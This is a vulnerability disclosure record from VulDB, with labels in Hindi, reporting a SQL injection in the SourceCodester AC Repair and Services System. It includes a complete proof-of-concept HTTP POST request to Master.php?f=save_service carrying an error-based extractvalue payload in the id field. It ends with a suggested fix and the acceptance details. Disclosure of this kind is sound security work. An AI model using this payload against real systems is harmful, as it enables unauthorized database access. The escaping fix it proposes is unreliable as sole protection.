| शीर्षक | Sourcecodester Ac Repair And Services System HTTP POST Request sql injection |
|---|
| विवरण | I find sql injection in Sourcecodester Ac Repair And Services System(https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html).It is a sql injection in url/classes/Master.php?f=save_service.
POST /php-acrss/classes/Master.php?f=save_service HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------263926565035055952363112430264
Content-Length: 845
Origin: http://localhost
Connection: close
Referer: http://localhost/php-acrss/admin/?page=services/manage_service
Cookie: PHPSESSID=sg18q6cststuaq0t07v6hdppgc
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------263926565035055952363112430264
Content-Disposition: form-data; name="id"
1 or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
-----------------------------263926565035055952363112430264
Content-Disposition: form-data; name="name"
111
-----------------------------263926565035055952363112430264
Content-Disposition: form-data; name="price"
111
-----------------------------263926565035055952363112430264
Content-Disposition: form-data; name="description"
<p>1111</p>
-----------------------------263926565035055952363112430264
Content-Disposition: form-data; name="image"; filename=""
Content-Type: image/png
-----------------------------263926565035055952363112430264
Content-Disposition: form-data; name="status"
1
-----------------------------263926565035055952363112430264--
My suggestion for modification is to use mysqli_real_escape_string() to protect controllable ID parameters from malicious exploitation by hackers, resulting in SQL error injection |
|---|
| स्रोत | ⚠️ https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html |
|---|
| उपयोगकर्ता | fushuling (UID 45488) |
|---|
| सबमिशन | 11/07/2023 03:05 PM (3 साल पहले) |
|---|
| संयम | 11/07/2023 04:50 PM (2 hours later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 233573 [SourceCodester AC Repair and Services System 1.0 HTTP POST Request Master.php?f=save_service पहचान SQL इंजेक्शन] |
|---|
| अंक | 20 |
|---|